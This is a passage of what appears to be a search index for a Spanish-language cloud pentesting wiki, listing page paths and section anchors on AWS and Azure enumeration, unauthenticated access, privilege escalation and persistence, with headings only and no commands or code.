enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#persistencia","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#aws---enumeración-de-base-de-datos-relacional-rds","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#información-básica","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#credenciales","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#autenticación","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#acceso-público-y-vpc","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#encriptación","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#acceso-no-autenticado","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#escalación-de-privilegios","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#persistencia","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#inyección-sql","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#aws---route53-enum","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#route-53","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#enrutamiento-basado-en-ip","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#aws---enumeración-de-secrets-manager","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#aws-secrets-manager","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#persistencia","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#aws---ses-enum","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#información-básica","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#usuario-smtp","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#aws---sns-enum","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#sns","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#diferencia-con-sqs","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#aws---sqs-enum","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#sqs","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#aws---s3-athena-y-glacier-enum","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#versionado-de-bucket-y-eliminación-basada-en-mfa","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#registros-de-acceso-a-s3","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#urls-presignadas-de-s3","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#mecanismos-de-cifrado-s3","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#dual-stack","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#acceso-no-autenticado","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-post-explotación","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#persistencia","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#otras-vulnerabilidades-de-s3","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#problema-de-envenenamiento-de-caché-http-de-s3","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#amazon-athena","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#enumeración-1","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#aws---enumeración-de-step-functions","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#step-functions","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#conceptos-clave","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#flujos-de-trabajo-estándar-vs-expresos","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#estados","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#tarea","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#elección","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#fallarsuceder","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#pass","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#esperar","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#paralelo","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#mapa","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#versiones-y-alias","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#roles-de-iam-para-máquinas-de-estado","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#persistencia","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#aws---sts-enum","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#sts","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#suplantación-de-rol","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#persistencia","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#aws---enumeración-de-otros-servicios","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#directconnect","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#soporte","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#aws---enumeración-y-acceso-no-autenticado","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#fugas-de-credenciales-de-aws","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#enumeración-y-acceso-no-autenticado-en-aws","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#ataques-entre-cuentas","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#herramientas","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#aws---enumeración-no-autenticada-de-cuentas","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#ids-de-cuenta","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#fuerza-bruta","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#osint","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#marketplace","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#snapshots","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#errors","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#references","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#aws---api-gateway-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#bypass-de-invocación-de-api","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#inyección-de-políticas-iam","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#plantilla-de-url-pública","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#obtener-id-de-cuenta-desde-la-url-pública-de-api-gateway","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.html#aws---cloudfront-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.html#plantilla-de-url-pública","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#aws---cognito-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#cognito-no-autenticado","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#id-de-pool-de-identidad","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#id-de-pool-de-usuarios","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#módulos-de-pacu-para-pentesting-y-enumeración","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#aws---acceso-no-autenticado-a-codebuild","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#codebuild","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#buildspecyml","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#runners-de-github-actions-autoalojados-en-aws-codebuild","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.html#aws---documentdb-enum-no-autenticado","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.html#plantilla-de-url-pública","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.html#aws---acceso-no-autenticado-a-dynamodb","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.html#dynamo-db","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#aws---ec2-enumeración-no-autenticada","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#ec2-y-servicios-relacionados","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#puertos-públicos","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#amis-públicas-y-snapshots-de-ebs","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#enumerar-instancias-de-ec2-con-ip-pública","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#aws---ecr-enumeración-no-autenticada","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#ecr","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#repositorios-de-registro-público-imágenes","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#enumerar-repositorio-privado","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#aws---ecs-enumeración-no-autenticada","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#ecs","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#grupo-de-seguridad-o-balanceador-de-carga-accesible-públicamente-para-servicios-de-ecs","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#aws---elastic-beanstalk-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#vulnerabilidad-web","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#reglas-de-grupo-de-seguridad-inseguras","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#balanceador-de-carga-accesible-públicamente","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#buckets-de-s3-accesibles-públicamente","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#enumerar-entornos-públicos","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.html#aws---elasticsearch-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.html#plantilla-de-url-pública","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#aws---iam--sts-enumeración-no-autenticada","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#enumerar-roles-y-nombres-de-usuario-en-una-cuenta","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#fuerza-bruta-para-asumir-rol","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#políticas-de-confianza-fuerza-bruta-de-roles-y-usuarios-entre-cuentas","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#privesc","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#federación-oidc-de-terceros","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#referencias","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#aws---identity-center--sso-enumeración-no-autenticada","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#phishing-de-código-de-dispositivo-de-aws","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#ataque","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#phishing-al-mfa-inphishable","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#herramientas-automáticas","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#referencias","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.html#aws---iot-enumeración-no-autenticada","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.html#plantilla-de-url-pública","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.html#aws---kinesis-video-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.html#plantilla-de-url-pública","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#aws---acceso-no-autenticado-a-lambda","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#url-de-función-pública","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#plantilla-de-url-pública","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#obtener-el-id-de-la-cuenta-desde-la-url-pública-de-lambda","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.html#aws---enumeración-de-medios-no-autenticada","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.html#plantilla-de-url-pública","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#aws---mq-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#puerto-público","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#rabbitmq","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#activemq","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#plantilla-de-url-pública","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#aws---msk-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#puerto-público","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#plantilla-de-url-pública","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#aws---rds-enumeración-no-autenticada","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#rds","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#puerto-público","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#instantáneas-públicas-de-rds","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#plantilla-de-url-pública","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.html#aws---redshift-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.html#plantilla-de-url-pública","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#aws---sqs-enumeración-no-autenticada","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#sqs","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#plantilla-de-url-pública","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#verificar-permisos","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#aws---sns-enumeración-no-autenticada","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#sns","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#abierto-a-todos","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#aws---s3-enumeración-no-autenticada","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#cubos-públicos-de-s3","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#encontrar-cubos-de-aws","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#encontrar-la-región","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#enumerando-el-bucket","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#plantilla-de-url-pública","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#obtener-id-de-cuenta-de-un-bucket-público","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#confirmando-que-un-bucket-pertenece-a-una-cuenta-de-aws","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#correos-electrónicos-utilizados-como-enumeración-de-cuentas-raíz","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#referencias","pentesting-cloud/azure-security/index.html#azure-pentesting","pentesting-cloud/azure-security/index.html#información-básica","pentesting-cloud/azure-security/index.html#metodología-de-pentestingred-team-de-azure","pentesting-cloud/azure-security/index.html#enumeración-externa-y-acceso-inicial","pentesting-cloud/azure-security/index.html#herramientas-de-azure-y-entra-id","pentesting-cloud/azure-security/index.html#bypass-de-políticas-de-acceso","pentesting-cloud/azure-security/index.html#whoami","pentesting-cloud/azure-security/index.html#enumeración-de-entra-id-y-privesc","pentesting-cloud/azure-security/index.html#enumeración-de-azure","pentesting-cloud/azure-security/index.html#escalación-de-privilegios-post-explotación-y-persistencia","pentesting-cloud/azure-security/az-basic-information/index.html#az---información-básica","pentesting-cloud/azure-security/az-basic-information/index.html#jerarquía-de-organización","pentesting-cloud/azure-security/az-basic-information/index.html#grupos-de-gestión","pentesting-cloud/azure-security/az-basic-information/index.html#suscripciones-de-azure","pentesting-cloud/azure-security/az-basic-information/index.html#grupos-de-recursos","pentesting-cloud/azure-security/az-basic-information/index.html#ids-de-recursos-de-azure","pentesting-cloud/azure-security/az-basic-information/index.html#azure-vs-entra-id-vs-servicios-de-dominio-de-azure-ad","pentesting-cloud/azure-security/az-basic-information/index.html#azure","pentesting-cloud/azure-security/az-basic-information/index.html#entra-id-anteriormente-azure-active-directory","pentesting-cloud/azure-security/az-basic-information/index.html#servicios-de-dominio-de-entra-anteriormente-azure-ad-ds","pentesting-cloud/azure-security/az-basic-information/index.html#principales-de-entra-id","pentesting-cloud/azure-security/az-basic-information/index.html#usuarios","pentesting-cloud/azure-security/az-basic-information/index.html#permisos-predeterminados-para-miembros-e-invitados","pentesting-cloud/azure-security/az-basic-information/index.html#permisos-configurables-predeterminados-para-usuarios","pentesting-cloud/azure-security/az-basic-information/index.html#grupos","pentesting-cloud/azure-security/az-basic-information/index.html#principales-de-servicio","pentesting-cloud/azure-security/az-basic-information/index.html#registraciones-de-aplicaciones","pentesting-cloud/azure-security/az-basic-information/index.html#permisos-de-consentimiento-predeterminados","pentesting-cloud/azure-security/az-basic-information/index.html#identidad-administrada-metadatos","pentesting-cloud/azure-security/az-basic-information/index.html#aplicaciones-empresariales","pentesting-cloud/azure-security/az-basic-information/index.html#unidades-administrativas","pentesting-cloud/azure-security/az-basic-information/index.html#roles-y-permisos-de-entra-id","pentesting-cloud/azure-security/az-basic-information/index.html#roles-y-permisos-de-azure","pentesting-cloud/azure-security/az-basic-information/index.html#roles-integrados","pentesting-cloud/azure-security/az-basic-information/index.html#roles-personalizados","pentesting-cloud/azure-security/az-basic-information/index.html#orden-de-permisos","pentesting-cloud/azure-security/az-basic-information/index.html#administrador-global","pentesting-cloud/azure-security/az-basic-information/index.html#condiciones-de-asignaciones-y-mfa","pentesting-cloud/azure-security/az-basic-information/index.html#asignaciones-de-denegación","pentesting-cloud/azure-security/az-basic-information/index.html#políticas-de-azure","pentesting-cloud/azure-security/az-basic-information/index.html#herencia-de-permisos","pentesting-cloud/azure-security/az-basic-information/index.html#azure-rbac-vs-abac","pentesting-cloud/azure-security/az-basic-information/index.html#referencias","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#az---tokens--public-applications","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#basic-information","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#oauth","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#authentication-tokens","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#access-tokens-aud","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#otros-campos-del-token-de-acceso","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#escalación-de-privilegios-de-tokens-foci","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#obtener-un-alcance-diferente","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#obtener-diferentes-clientes-y-ámbitos","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#referencias","pentesting-cloud/azure-security/az-enumeration-tools.html#az---herramientas-de-enumeración","pentesting-cloud/azure-security/az-enumeration-tools.html#instalar-powershell-en-linux","pentesting-cloud/azure-security/az-enumeration-tools.html#instalar-powershell-en-macos","pentesting-cloud/azure-security/az-enumeration-tools.html#herramientas-principales-de-enumeración","pentesting-cloud/azure-security/az-enumeration-tools.html#az-cli","pentesting-cloud/azure-security/az-enumeration-tools.html#az-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#microsoft-graph-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#azuread-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#herramientas-de-reconocimiento-automatizado-y-cumplimiento","pentesting-cloud/azure-security/az-enumeration-tools.html#turbot-azure-plugins","pentesting-cloud/azure-security/az-enumeration-tools.html#prowler","pentesting-cloud/azure-security/az-enumeration-tools.html#monkey365","pentesting-cloud/azure-security/az-enumeration-tools.html#scoutsuite","pentesting-cloud/azure-security/az-enumeration-tools.html#azure-mg-sub-governance-reporting","pentesting-cloud/azure-security/az-enumeration-tools.html#herramientas-de-post-explotación-automatizadas","pentesting-cloud/azure-security/az-enumeration-tools.html#roadrecon","pentesting-cloud/azure-security/az-enumeration-tools.html#azurehound","pentesting-cloud/azure-security/az-enumeration-tools.html#microburst","pentesting-cloud/azure-security/az-enumeration-tools.html#powerzure","pentesting-cloud/azure-security/az-enumeration-tools.html#graphrunner","pentesting-cloud/azure-security/az-enumeration-tools.html#stormspotter","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#az---enumeración-no-autenticada-y-entrada-inicial","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#azure-tenant","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#enumeración-de-inquilinos","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#enumeración-de-usuarios","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#password-spraying--brute-force","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#servicios-de-azure-utilizando-dominios","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#credenciales-del-sistema-de-archivos","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#referencias","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-container-registry-unauth.html#az---registro-de-contenedores-no-autenticado","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-container-registry-unauth.html#registro-de-contenedores-no-autenticado","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-container-registry-unauth.html#acceso-anónimo-de-extracción","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#az---oauth-apps-phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#phishing-de-aplicaciones-oauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#permisos-de-consentimiento-de-la-aplicación","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#2-tipos-de-ataques","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#los-usuarios-pueden-consentir","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#administradores-de-aplicaciones","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#descripción-general-del-flujo-de-ataque","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#ejemplo-de-ataque","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#otras-herramientas","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#post-explotación","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#phishing-post-explotación","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#administrador-de-aplicaciones-de-entra-id","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#post-explotación-de-aplicaciones","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#referencias","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#az---storage-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#storage-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#open-storage","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#sas-urls","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#az---vms-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unaut